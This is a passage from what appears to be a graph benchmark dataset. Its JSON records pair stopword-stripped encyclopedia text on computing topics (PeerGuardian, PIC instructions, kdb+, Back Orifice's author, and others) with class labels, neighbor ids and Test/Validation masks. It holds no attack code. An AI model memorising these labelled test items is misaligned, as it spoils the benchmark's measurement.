  },
  {
    "node_id": 1171,
    "label": 7,
    "text": "Kami_(app):kami app kami formerly known notable pdf auckland-based cloud-based company known document files reader editor collaborative tool also available google marketplace headquartered auckland kami founded 2012 alliv samson jordan thoms hengjie wang sam altman investor kami built upon html5 app browsers make easy approachable tool working online 2014 kami announced management partnering google google work partner program order target education users online use kami targets facilitate web users chrome extension allows users annotate pdf files .docx .pptx image files within browser basic task tool make online documents easily usable real life applications app leverages easy read edit approach documents thus replacing outdated arduous printing marking scanning processes kami finds uniqueness provision web services editing pdf documents local level result tool able offer offline editing enhance value application company management plans extend tool compatibility formats autocad photoshop extension includes introduction relevant annotation tools support desired document extensions app",
    "neighbors": [
      8627,
      8413
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1172,
    "label": 4,
    "text": "PeerGuardian:peerguardian peerguardian free open source program developed phoenix labs capable blocking incoming outgoing connections based ip blacklists aim use block peers torrent download visibility peer connection using ip lists system also capable blocking custom ranges depending upon user preferences windows version program discontinued favor applications phoenix labs encourage current peerguardian users migrate peerblock based peerguardian 2 development peerguardian started late 2002 led programmer tim leonard first public version released 2003 time music industry started sue individual file sharing users change previous stance would target consumers copyright infringement lawsuits original peerguardian 1.0 programmed visual basic quickly became popular among p2p users despite blocking common tcp protocol known high ram cpu usage connected p2p networks december 2003 downloaded 1 million times original version released free source code made available open source license due version 1.0 blocking tcp ports peerguardian.net shifted bluetack.co.uk protowall blocklist manager b.i.m.s hosts manager developed 7 months development february 2005 version 2 peerguardian released beta development version 2.0 led cory nelson aimed resolve many shortcomings version 1 version 2 enabled support protocols tcp udp icmp etc multiple block lists automatic updates installation procedure also simplified longer requiring system restart driver installation speed resource inefficiencies fixed re-designing re-coding version 2.0 c++ consume less processing power memory desktop firewall software windows version 2.0 installed kernel-level filter windows 2000 later giving application direct access windows networking stack improving performance support windows vista ipv6 release candidate phase may 2009 blacklist stored number different formats binary formats known p2b created release first beta version peerguardian 2 order create smallest possible blocklist original format peerguardian version 1.x simple plaintext format unfortunately meant lists became large cost lot bandwidth distribute heralding construction smaller binary formats format follows example format also used emule safepeer vuze plugin protowall ktorrent transmission since least 2006 p2p blocklist used peerguardian provided bluetack internet security solutions bluetack name member original peerguardian team owned previous domain peerguardian.net created block list manager used maintain list bluetack.co.uk developed application called bluetack internet management system b.i.m.s would spider whois servers create map internet ip addresses database admins site seraphielx moore firstaid tozanno deathangel r00ted would search names anti-p2p companies set status code entry make blocklists would downloaded blocklist manager import peerguardian protowall applications would block anti-p2p traffic accessing download would also obtain logs people sent letters downloading illegal software music videos figure list belong flag entry safe peerguardian developers state control bluetack list promote link alternative lists criticized overly broad blocking based unsubstantiated evidence peerguardian acknowledges battlefield 2 blizzard steam arenanet connectivity blocked creates problems many online gaming users aware peerguardian break game connectivity thus directed read manual blocklist manager application users add sites safe list allowing continue using games websites without interference peerguardian 2007 bluetack/peerguardian 2 criticized blocking denis.stalker.h3q.com second largest bittorrent tracker december 2007 anti-p2p address claiming maintainers whose tracking software opentracker also used pirate bay conspiring mpaa mediadefender maintainers members chaos computer club ccc long-standing association hackers freedom information activists also briefly run tracker ccc network bluetack also blocked ccc accusing anti-p2p work threat file sharers others pointed fact ccc publicly defending p2p years even called boycotting music industry protest file sharing lawsuits although ip addresses government business entities easily added list ip addresses blocked means peerguardian block access government business using undocumented ip address identify people engaged copyright infringement possibly unlawful activity peerguardian lite derivative peerguardian 2 made consume little cpu ram possible ui options consists single tray icon longer developed latest version released april 22 2005 also open-source allowing future derivatives party developers reported online peerguardian lite continued project program peerblock peerguardian lite users recommended around 2008 switch peerblock peerblock options uses almost little cpu peerguardian lite besides original criticism version 1 slow buggy criticism peerguardian around actual technique used block peers critics pointed blocklists open public thus parties may wish circumvent peerguardian actively check list see ip addresses blocked blocklists also managed public fool-proof method checking reporting ip address range bad checking blocked ip addresses still remain bad list relies public make submissions thus vulnerable attack see section blocklist management issues vista 64 bit windows 7 64 bit listed application compatibility require work around involving disabling driver signing may require degree computer skill",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      1163,
      6797,
      11029,
      9496,
      3482,
      1436,
      4511,
      5407,
      6431,
      10531,
      5924,
      550,
      8998,
      10790,
      3243,
      1708,
      3885,
      7983,
      8753,
      823,
      569,
      5178,
      11577,
      9279,
      8640,
      5057,
      1858,
      10433,
      708,
      11073,
      2118,
      4814,
      847,
      9423,
      4561,
      7121,
      10451,
      10574,
      10708,
      4568,
      4953,
      9048,
      2907,
      6364,
      5470,
      5860,
      3942,
      10987,
      8943,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 1173,
    "label": 4,
    "text": "Truncated_differential_cryptanalysis:truncated differential cryptanalysis cryptography truncated differential cryptanalysis generalization differential cryptanalysis attack block ciphers lars knudsen developed technique 1994 whereas ordinary differential cryptanalysis analyzes full difference two texts truncated variant considers differences partially determined attack makes predictions bits instead full block technique applied safer idea skipjack e2 twofish camellia crypton even stream cipher salsa20",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1941,
      4128,
      4389,
      10662,
      169,
      11185,
      8627,
      8628,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      4561,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      1114,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 1174,
    "label": 1,
    "text": "Distributional–relational_database:distributional–relational database distributional–relational database word-vector database database management system dbms uses distributional word-vector representations enrich semantics structured data distributional word-vectors automatically built automatically large-scale corpora enrichment supports construction databases embed large-scale commonsense background knowledge operations distributional-relational models applied construction schema-agnostic databases databases users query data without aware schema semantic search schema-integration inductive abductive reasoners well different applications semantically flexible knowledge representation model needed main advantage distributional–relational models purely logical semantic web models fact core semantic associations automatically captured corpora contrast definition manually curated ontologies rule knowledge bases distributional–relational models first formalized mechanism cope vocabulary/semantic gap users schema behind data scenario distributional semantic relatedness measures combined semantic pivoting heuristics support approximation user queries expressed vocabulary data expressed vocabulary dataset designer model database symbols entities relations embedded distributional semantic space geometric interpretation latent explicit semantic space geometric aspect supports semantic approximation entities different databases query term database entity distributional relational model becomes double layered model semantics structured data provides fine-grained semantics intended database designer extended distributional semantic model contains semantic associations expressed broader use models support generalization closed communication scenario database designers users live context e.g organization open communication scenario e.g different organizations web creating abstraction layer users specific representation conceptual model",
    "neighbors": [
      4713,
      10452
    ],
    "mask": "Test"
  },
  {
    "node_id": 1175,
    "label": 3,
    "text": "PIC_instruction_listings:pic instruction listings pic instruction set refers set instructions microchip technology pic dspic microcontroller supports instructions usually programmed flash memory processor automatically executed microcontroller startup picmicro chips harvard architecture instruction words unusual sizes originally 12-bit instructions included 5 address bits specify memory operand 9-bit branch destinations later revisions added opcode bits allowing additional address bits instruction set tables follow register numbers referred f constants referred k bit numbers 0–7 selected b bit selects destination 0 indicates w 1 indicates result written back source register f. c z status flags may set based result otherwise unmodified add subtract rotate instructions set c also set dc digit carry flag carry bit 3 bit 4 useful bcd arithmetic memory operands also referred registers simply general-purpose storage ram locations reserved special function registers except single accumulator called codice_1 almost registers memory-mapped even registers like program counter alu status register exceptions memory-mapped return address stack tri-state registers used configure gpio pins instruction set contain conditional branch instructions instead contains conditional skip instructions cause following instruction ignored conditional skip followed unconditional branch performs conditional branch skip instructions test bit register alu status register one possibility memory operands specified absolute address location fixed compile time provide indirect addressing pair special function registers provided mechanism also allows 256 bytes memory addressed even instruction set allows 5- 7-bit memory operands models registers special function registers plus ram fit instruction provide multiple banks memory use one two mechanisms accessing pic processors 256 words program use paged memory internal program counter return stack wide necessary address memory low 8 bits visible software codice_5 pc low register additional codice_6 pc latch high register modified software operation specify full destination address 9-bit codice_7 8-bit write pc register fills additional high bits corresponding part pclath pic18 processors extend beyond 16 bits pclatu register supply bits 16–23 † extended instruction available enhanced baseline pics models 16f527 16f570 mcv20a interrupt support 4-level stack include instructions models also include movlb elan microelectronics corp. make series picmicro-like microcontrollers 13-bit instruction word instructions mostly compatible mid-range 14-bit instruction set limited 6-bit register address 16 special-purpose registers 48 bytes ram 10-bit 1024 word program space 10-bit program counter accessible r2 reads access low bits writes clear high bits exception tbl instruction modifies low byte preserving bits 8 9 7 accumulator-immediate instructions renumbered relative 14-bit picmicro fit 3 opcode bits rather 4 well additional software interrupt instruction additional miscellaneous instructions changes terminology picmicro option register called control register picmicro tris registers 1–3 called i/o control registers 5–7 equivalents obvious † instruction unique em78 instruction set pic equivalent models support multiple rom ram banks manner similar pic microcontrollers also 15-bit variant instruction set almost identical except register numbers enlarged 8 bits call jump addresses enlarged 12 bits differences second generation 15-bit instruction set includes several additional instructions † em89f768n operands results special registers ‡ em88f794n mtf213 mtf351 devices feature 14-bit wide code memory improved 8 level deep call stack instruction set differs little baseline devices 2 additional opcode bits allow 128 registers 2048 words code directly addressed additional miscellaneous instructions two additional 8-bit literal instructions add subtract mid-range core available majority devices labeled pic12 pic16 enhanced mid-range core devices introduce deeper hardware stack additional reset methods 14 additional instructions c programming language optimizations particular two codice_8 codice_9 codice_10 two corresponding codice_2 register pairs codice_12 codice_13 special instructions use codice_14 registers like address registers variety addressing modes holtek make numerous 8-bit microcontrollers 14-bit instruction word equivalent non-enhanced mid-range core instruction encodings fit 14 bits provide 7-bit operand addresses models 4k 8k words program rom provide 15- 16-bit wide rom extend basic 11-bit destination address using bits 14–15 instruction bits 11–12 address models extend 7-bit ram addresses using bit 14 instruction bit 7 operand address instruction format identical microchip opcodes assigned different order manufacturer uses different instruction mnemonics accumulator called acc rather w destination specified suffix instruction mnemonic rather operand addition opcode assignment semantic differences instructions several operations added 14-bit picmicro repertoire 2000 microchip introduced pic18 architecture unlike 17 series proven popular large number device variants presently manufacture contrast earlier devices often programmed assembly c become predominant development language pic18 12-bit ram address space divided 16 pages 256 bytes 8-bit codice_15 field determines address combination codice_16 bit 4-bit bank select register codice_17 codice_16=0 codice_17 ignored codice_15 field sign-extended range 0x000–0x07f global ram 0xf80–0xfff special function registers codice_16=1 codice_15 field extended codice_17 generate 12-bit address pic18 extends codice_2/codice_3 mechanism used previous picmicro processors indirect addressing two ways first provides three file select registers codice_14 registers 12 bits long split two 8-bit portions codice_27 codice_28 access corresponding codice_29 register codice_9 codice_31 acts alias addressed byte second addressing modes three one codice_29 register five one used determines addressing mode also instructions directly load fsr pair 12-bit address codice_46 instruction moves byte two 12-bit addresses 2001 microchip introduced dspic series chips entered mass production late 2004 microchip first inherently 16-bit microcontrollers pic24 devices designed general purpose microcontrollers dspic devices include digital signal processing capabilities addition instructions come two main varieties one like classic one-operand pic instructions operation w0 value specified f register i.e first 8k ram destination select bit selecting updated result w registers memory-mapped f operand may specify w register form new pic24 specifies three w register operands two allow 3-bit addressing mode specification register offset addressing mode available codice_48 instruction ww register may used register offset source destination instructions use encoding unsigned 5-bit immediate source instead operands codice_49 codice_50 access program memory indirect modes allowed refer addresses code memory instructions 2 words long second word nop includes 16 bits additional immediate operand",
    "neighbors": [
      6821,
      9739,
      11499,
      3630,
      9044,
      7445,
      5911,
      10013
    ],
    "mask": "Test"
  },
  {
    "node_id": 1176,
    "label": 3,
    "text": "Inter-processor_interrupt:inter-processor interrupt inter-processor interrupt ipi special type interrupt one processor may interrupt another processor multiprocessor system interrupting processor requires action processor actions might requested include m65mp option os/360 used direct control feature s/360 generate interrupt another processor s/370 successors including z/architecture signal processor instruction provides formalized interface ibm pc compatible computers use advanced programmable interrupt controller apic ipi signalling often performed using apic cpu wishes send interrupt another cpu stores interrupt vector identifier target local apic interrupt command register icr local apic message sent via apic bus target local apic therefore issues corresponding interrupt cpu multiprocessor system running microsoft windows processor may interrupt another processor following reasons addition ones listed ipis given irql 29",
    "neighbors": [
      1058,
      868,
      3272,
      10508,
      6797,
      5457,
      6129,
      9105,
      7607,
      5529,
      1660,
      3294,
      5823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1177,
    "label": 2,
    "text": "AirPrint:airprint airprint feature apple inc. macos ios operating systems printing via wireless lan wi-fi either directly airprint-compatible printers non-compatible shared printers way computer running microsoft windows linux macos airprint require printer-specific drivers originally intended ios devices connected via wi-fi network thus required wi-fi access point however introduction airprint macos desktop platform 2012 macs connected network via ethernet connection could also print using airprint protocol—not connected via wi-fi direct wi-fi connection device printer supported default appeared 'hp eprint wireless direct airprint feature following ipad introduction 2010 user concerns raised product inability print least supported apple solution apple founder ceo steve jobs reportedly replied user request printing email come may 2010 airprint fall 2010 introduction part ios 4.2 gave iphones ipads printing capability first time airprint mac computers introduced mac os x lion release launch twelve printers airprint compatible hp photosmart plus e-all-in-one series july 2014 number grown 1,100 compatible printer models two dozen different manufacturers current list found apple support site related technology covered us patent 20110194123 printer supports driverless printing number software solutions allow non-airprint printers used ios devices configuring support intermediary system accessible via wi-fi connected printer since airprint driverless configuration compensates printer lack native airprint support using drivers intermediary system instead simplest solution platforms create new bonjour service tricks ios clients believing 're talking airprint device many blog posts commercial software products exist accomplish well open source solutions linux works many cases airprint extension internet printing protocol ipp many printers already support either directly result shared intermediary system typically cups mac/linux printing system approach limited however airprint-specific components protocol missing lead compatibility issues unexpected results software packages address completely translating two dialects ipp avoiding compatibility issues re-share printers using airprint service name microsoft windows free paid solutions macos bonjour service exists enables airprint support legacy printers commercial macos software purpose includes netputing handyprint ecamm printopia gnu/linux distributions airprint support automatic cups default printing subsystem since version 1.4.6 trisquel 5 ubuntu 11.04 cups servers version 1.4.6 dns based service discovery also configured manually adding dns-sd printer service discovery records name server number 3rd party solutions available apple app store elsewhere allow printing legacy printers directly via application helper netgear genie mac os x 10.6 windows xp vista 7 8 genie permits shared network attached printer made accessible via airprint application free customers current netgear routers printopia pro commercial solution designed allow airprint work large business education networks offers features useful large organizations including centralized management directory integration allows airprint operate across subnets requires server running mac os x 10.7 later one server potentially serve entire organization",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      576,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7806,
      2686,
      6783,
      10878,
      6797,
      5784,
      4251,
      3228,
      2207,
      11430,
      171,
      2735,
      3248,
      7857,
      4283,
      3772,
      7869,
      3790,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      7420,
      5384,
      1290,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      823,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      2887,
      4957,
      6495,
      9063,
      4457,
      10602,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      3483,
      2979,
      9123,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7626,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      2023,
      8170,
      7154,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 1178,
    "label": 1,
    "text": "Kdb+:kdb+ kdb+ column-based relational time series database tsdb in-memory imdb abilities developed marketed kx systems database commonly used high-frequency trading hft store analyze process retrieve large data sets high speed kdb+ ability handle billions records analyzes data within database database available 32-bit 64-bit versions several operating systems financial institutions use kdb+ analyze time series data stock commodity exchange data database also used time-sensitive data applications including commodity markets energy trading telecommunications sensor data log data machine computer network usage monitoring kdb+ high-performance column-store database designed process store large amounts data commonly accessed data pushed random-access memory ram faster access data disk storage created financial institutions mind database developed central repository store time series data supports real-time analysis billions records kdb+ ability analyze data time responds queries similar structured query language sql columnar databases return answers queries efficient way row-based database management systems kdb+ dictionaries tables nanosecond time stamps native data types used store time series data core kdb+ built-in programming language q concise expressive query array language dialect language apl q manipulate streaming real-time historical data kdb+ uses q aggregate analyze data perform statistical functions join data sets supports sql queries vector language q built speed expressiveness eliminates need looping structures kdb+ includes interfaces c c++ java c python 1998 kx systems released kdb database built language k written arthur whitney 2003 kdb+ released 64-bit version kdb 2004 kdb+ tick market database framework released along kdb+ taq loader new york stock exchange nyse taq data kdb+ created arthur whitney building prior work array languages april 2007 kx systems announced releasing version kdb+ mac os x time kdb+ also available operating systems linux windows solaris september 2012 version 3.0 released optimized intel upgraded processors support websockets globally unique identifiers guid universally unique identifiers uuid intel advanced vector extensions avx streaming simd extensions 4 sse4 4.2 sandy bridge processors time allowed enhanced support kdb+ system june 2013 version 3.1 released benchmarks 8 times faster older versions",
    "neighbors": [
      3,
      5380,
      9993,
      6797,
      3219,
      667,
      8987,
      2088,
      10668,
      5677,
      10413,
      7983,
      823,
      4921,
      9019,
      833,
      9286,
      1099,
      7630,
      2383,
      5073,
      2901,
      2519,
      7767,
      1883,
      11099,
      9825,
      8695,
      11625,
      8554,
      4331,
      5356,
      9834,
      2670,
      1142,
      1399,
      505,
      3323,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1179,
    "label": 4,
    "text": "Automated_threat:automated threat automated threat type computer security threat computer network web application characterised malicious use automated tools internet bots automated threats popular internet complete large amounts repetitive tasks almost cost execute owasp automated threat handbook provides threat ontology list classifying automated threats enumerated",
    "neighbors": [
      2558,
      612,
      9293,
      2262
    ],
    "mask": "Test"
  },
  {
    "node_id": 1180,
    "label": 9,
    "text": "David_Gries:david gries david gries born 26 april 1939 flushing queens new york american computer scientist cornell university united states primarily known books science programming 1981 logical approach discrete math 1993 fred b. schneider currently associate dean undergraduate programs cornell university college engineering research interests include programming methodology related areas programming languages programming language semantics logic son paul gries co-author introductory textbook computer programming using python professor teaching stream department computer science university toronto gries graduated queens college 1960 spent following two years working programmer-mathematician u.s naval weapons laboratory met wife elaine gries earned master degree mathematics university illinois urbana-champaign 1963 illinois gries worked manfred paul ruediger wiehle write full algol compiler ibm 7090 computer earned dr. rer nat 1966 munich university technology studying friedrich l. bauer joseph stoer gries assistant professor stanford university 1966–1969 became associate professor cornell university ithaca new york spent next 30 years including stint chair computer science department 1982–1987 guggenheim fellowship 1984–1985 spent 1999–2002 university georgia athens returned cornell january 2003 author co-author editor seven textbooks 75 research papers david gries currently lives ithaca new york gries recipient four major educator awards computer science holds two honorary doctorates among first ten cornell faculty awarded cornell weiss presidential fellowship contributions undergraduate education 1994 inducted fellow association computing machinery co-authoring axiomatic proof technique parallel programs",
    "neighbors": [
      512,
      3529,
      726,
      1783,
      5496
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1181,
    "label": 3,
    "text": "Fixstars_Solutions:fixstars solutions fixstars solutions inc software services company specializing multi-core processors particularly nvidia gpu cuda environment ibm power7 cell also specialize solid-state drives currently manufacture world largest sata drives early part 2010 fixstars developed strong relationship nvidia focused linux distribution gpu computing yellow dog enterprise linux cuda first enterprise linux os optimized gpu computing offers end users developers integrators faster reliable less complex gpu computing experience november 11 2008 japanese company fixstars announced acquired essentially terra soft assets terra soft former founder ceo kai staats appointed coo fixstars new american subsidiary fixstars solutions based irvine california fixstars solutions retained terra soft product line staff regional offices loveland colorado terra soft provided software services powerpc/power isa linux os platform former terra soft solutions produced yellow dog linux ydl yellow dog enterprise linux included cluster construction tools customers included argonne sandia lawrence livermore los alamos national labs several department defense contractors including boeing lockheed martin saic u.s. airforce navy army nasa many top universities around world including california institute technology mit stanford university apple value-added reseller ibm business partner terra soft solutions provided turnkey build-to-order desktop workstations servers high performance computing clusters terra soft made yellow dog linux distribution solely powerpc/power isa optimizing distributions altivec cell terra soft first support variety apple computers linux pre-installed unique license apple apple abandoned powerpc cpus favor intel core chips terra soft able concentrate high-performance computing cell broadband engine working closely ibm sony playstation 3 products 2006 terra soft contracted sony provide linux operating system playstation 3 used several university researchers inexpensive powerful cluster compute node today fixstars tokyo japan carries forward yellow dog linux yellow dog enterprise linux product line primary focus heterogeneous multi-core cpus cell broadband engine nvidia gpu",
    "neighbors": [
      6311,
      8937,
      10985,
      7983,
      306,
      10675,
      8120,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 1182,
    "label": 4,
    "text": "Hacker_Halted:hacker halted hacker halted global series computer information security conferences presented ec-council objective hacker halted conferences raise international awareness towards increased education ethics security event currently 14th year also present hacker halted ec-council h cker halted academy trainings workshops led ec-council instructors trainers hacker halted malaysia held 2004 2007 2018 new delhi hacker halted conference held egypt 13 14 december 2018 hacker halted dubai held 2005 2006 dubai united hacker halted singapore held 2005 singapore hacker halted mexico held 2005 mexico hacker halted japan held november 11 2008 tokyo japan hacker halted usa held 2008 myrtle beach south carolina hacker halted usa held september 20–24 2009 miami florida hilton head hotel include events include capture flag event hacker halted usa held 2010 miami hacker halted usa held miami 25 27 october 2011 theme 2011 stop data leaks secure code hacker halted usa held miami october 29–31 2012 hacker halted usa held atlanta 2013 2014 2015 2016 2017 2018 hacker halted usa 2019 returns atlanta ga talks include tracks include hacker halted usa 2009 launch hacker halted academy hacker halted academy series classes presented ec-council partners many classes include ec-council training certification including certified ethical hacker licensed penetration tester well vendor specific certification including certified information systems security professional cissp nsa nsa information security assessment methodology iam /information security evaluation methodology iem training",
    "neighbors": [
      3112,
      7449,
      10307,
      357
    ],
    "mask": "Test"
  },
  {
    "node_id": 1183,
    "label": 3,
    "text": "Amazon_(video_game):amazon video game amazon interactive fiction graphic adventure game game published telarium formerly known trillium 1984 written michael crichton best-selling novelist director michael crichton computer hobbyist taught programming language basic early 1980s programmer stephen warady artist david durand began developing apple ii graphic adventure game based crichton novel congo sometimes programmed game sequences warady converted much faster assembly language worked project 18 months crichton found publisher spinnaker software approached adapting novels telarium division new bookware games author revealed game amazing spinnaker signed contract late 1983 crichton realize however already sold adaptation rights congo another party team revised game renamed amazon moving setting africa south america changing diamond mine emerald mine novel amy talking gorilla became paco talking parrot game mostly complete telarium able port commodore 64 amazon release crichton later said disappointed game due technological limitations time development amazon best-selling telarium title many 100,000 copies sold majority likely commodore 64 computer gaming world praised rarely used animated graphics crichton cooperation designers stating cohesive manner game storyline unfolds reflects crichton skill writer james delson family computing reviewed apple ii version wrote game limited graphics choice delson also noted game difficulty wrote patience virtue game necessity german reviewers recognized suspenseful atmospheric elaborated prose storyline graphics text parser got score sehr gut good",
    "neighbors": [
      9166,
      477,
      9006,
      6407
    ],
    "mask": "None"
  },
  {
    "node_id": 1184,
    "label": 9,
    "text": "Interpress:interpress interpress page description language developed xerox parc based forth programming language earlier graphics language called jam parc unable commercialize interpress two creators chuck geschke john warnock left xerox formed adobe systems produced similar language called postscript interpress used xerox printers supported xerox ventura publisher interpress also used output format parc interscript system editable word processor format rich text documents",
    "neighbors": [
      3904,
      10280,
      8763,
      8628
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1185,
    "label": 7,
    "text": "Grid_MP:grid mp grid mp commercial distributed computing software package developed sold univa formerly known united devices privately held company based primarily austin texas formerly known metaprocessor prior release version 4.0 however letters mp grid mp officially stand anything grid mp provides job scheduling prioritization user security restrictions selective application exclusion user-activity detection time-of-day execution controls grid mp used manage computational devices consisting corporate desktop pcs departmental servers dedicated cluster nodes computational devices arranged device groups organizational security administrative control grid mp demonstrated capable managing grids large numbers nodes use infrastructure grid.org world community grid projects world community grid project migrated open-source berkeley open infrastructure network computing software 2007 despite ability scale seamlessly hundreds thousands device nodes also suitable smaller clusters enterprise servers workstations mp grid services interface simply mgsi offers web service api via soap xml-rpc protocols http enables developers back-end application services access manipulate objects within system access api objects access controlled security restricted per-object basis since mgsi web service protocol programming language soap xml-rpc library available used interface although commonly c++ java perl php used web-based mp management console simply mpmc provides administrators simplified easy-to-use interface monitor system activity control security settings manage system objects mpmc written php programming language uses mgsi web service interactions system mp agent known ud agent versions 4.0 software agent must installed computer participate grid mp installation running jobs mp agent installed computer officially recognized grid mp device grid mp enterprise version 5.5 mp agent supported following platforms",
    "neighbors": [
      9602,
      8582,
      6797,
      1806,
      2064,
      6421,
      1304,
      10020,
      5677,
      7983,
      823,
      5956,
      8644,
      7134,
      5356,
      499,
      2804,
      10486,
      1399,
      3449,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 1186,
    "label": 3,
    "text": "IBM_ThinkPad_600:ibm thinkpad 600 ibm thinkpad 600 series series notebook computers introduced 1998 ibm immediate predecessor t-series still exists today lenovo ownership three models produced 600 600e 600x series succeeded 2000 thinkpad t20 series 600 series designed portable version 770 series featuring slimmer dimensions weight around 5 pounds 2.3 kg using lightweight strong carbon fiber composite plastics 600 series also introduced new ultraslimbay confused ultrabay slim found later t40/t60 series well easily interchangeable ram hard drives 600 series machines shipped 32 64mb ram integrated motherboard factory 600 series originally shipped either windows 95 windows nt 4.0 later models shipping windows 98 windows 2000 600 models could also run windows 3.x os/2 warp 4 windows windows xp well various linux distributions none 600 series models included wireless adapters ethernet ports option could added third-party pcmcia/cardbus card one common problem 600 series battery defect battery would discharge rapidly otherwise poor battery life use third-party battery well bios update help alleviate problem",
    "neighbors": [
      3304,
      3496,
      780,
      3250,
      8851,
      2165,
      3514,
      3323,
      10972
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1187,
    "label": 4,
    "text": "Sir_Dystic:sir dystic josh buchbinder better known sir dystic member cult dead cow cdc since may 1997 author back orifice also written several hacker tools including smbrelay nete nbname sir dystic appeared multiple hacker conventions member panels speaking also interviewed several television radio programs award-winning short film hacker culture general cdc particular dystic pseudonym taken somewhat obscure 1930s bondage comic character named sir dystic d'arcy according cdc sir dystic namesake tried evil things always bungles ends good inadvertently back orifice often shortened bo controversial computer program designed remote system administration enables user control computer running microsoft windows operating system remote location name pun microsoft backoffice server software program debuted def con 6 august 1 1998 brainchild sir dystic member u.s. hacker organization cult dead cow according group purpose demonstrate lack security microsoft operating system windows 98 according sir dystic bo supposed statement fact people feel secure safe although wide gaping holes operating system 're using means defense 're using hostile code mean message bo2k really different message vnunet.com reported sir dystic claim message privately commended employees microsoft smbrelay smbrelay2 computer programs used carry smb man middle mitm attacks windows machines written sir dystic released 21 march 2001 lantacon convention atlanta georgia nbname computer program used carry denial-of-service attacks disable netbios services windows machines written sir dystic released 29 july 2000 def con 8 convention las vegas sir dystic reported issue nbname exploits microsoft acknowledged security bulletin",
    "neighbors": [
      10914,
      10279,
      2409,
      6797,
      5111,
      9214,
      4863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1188,
    "label": 4,
    "text": "Cleanfeed_(Usenet_spam_filter):cleanfeed usenet spam filter cleanfeed spam filter use usenet news groups well blocking spam also able block binary image posts non-binary news groups html posts acts looking repeated patterns duplicate messages able identify known spamming sites domains published artistic license cleanfeed originally developed maintained jeremy nixon later marco d'itri last formal update released 5th aug 2001 beta release made available 1 may 2002 recommended version deploy 2007 steve crook began producing series updates initially designed counter hipcrime floods later releases include number new features patches later developed pyclean python equivalent cleanfeed",
    "neighbors": [
      3884,
      3350,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 1189,
    "label": 4,
    "text": "Michael_S._Rogers:michael s. rogers michael s. rogers born october 31 1959 former united states navy admiral served second commander u.s. cyber command uscybercom concurrently served 17th director national security agency nsa chief central security service css april 3 2014 prior rogers served commander tenth fleet commander u.s. fleet cyber command tenure helped transform elevate u.s. cyber command unified combatant command relinquished command may 4 2018 successor paul nakasone retired active duty united states navy june 1 2018 rogers born october 31 1959 native chicago illinois graduated new trier high school 1977 graduate auburn university 1981 naval war college rogers received commission naval reserve officers training corps nrotc program served united states navy since graduating auburn university 1981 started career surface warfare officer working naval gunfire support operations grenada beirut maritime surveillance operations el salvador board uss caron dd-970 1986 selected transfer unrestricted line officer restricted line officer re-designation cryptology officer 2003 u.s. invasion iraq rogers joined military joint staff works joint chiefs staff specialized computer network attacks 2007 onward served director intelligence military pacific command 2009 became director intelligence joint chiefs staff subsequently named commander u.s. fleet cyber command commander u.s. 10th fleet responsibility navy cyberwarfare efforts rogers first restricted line officer serve numbered fleet commander first information warfare community iwc officer achieve rank vice admiral january 2014 obama administration announced rogers nomination director national security agency commander united states offensive cyberoperations unit department defense rogers succeeded general keith b. alexander served nsa director nine years became first iwc officer achieve rank admiral although nsa directorship require senate approval rogers confirmed senate head united states cyber command senate unanimously confirmed first public remarks nsa director rogers stated believed nsa whistleblower edward snowden probably working foreign intelligence agency despite frequent speculation assertion nsa allies contrary rogers added clearly believes question n't agree fundamentally disagree believe wrong believe illegal tenure nsa director subject controversy number occasions notably including apparent recommendation part secretary defense remove post president barak obama congressional testimony suggesting president donald trump taking sufficient action russian influence january 2018 rogers announced would retiring nsa spring early 2019 rogers became chairman board advisors claroty cybersecurity firm",
    "neighbors": [
      6017,
      1930,
      268,
      1169,
      9233,
      8726,
      3495,
      8104,
      9517,
      1838,
      10935,
      5308,
      1986,
      6343,
      6344,
      11335,
      7119,
      7759,
      7887,
      3154,
      8276,
      7893,
      9688,
      991,
      7137,
      3305,
      7145,
      2419,
      6005,
      6136,
      766
    ],
    "mask": "Test"
  },
  {
    "node_id": 1190,
    "label": 6,
    "text": "Extended_file_system:extended file system extended file system ext implemented april 1992 first file system created specifically linux kernel metadata structure inspired traditional unix file system ufs designed rémy card overcome certain limitations minix file system first implementation used virtual file system vfs support added linux kernel version 0.96c could handle file systems 2 gigabytes gb size ext first series extended file systems 1993 superseded ext2 xiafs competed time ext2 long-term viability ext2 remedied issues ext immutability inodes fragmentation members extended file system family",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      8298,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
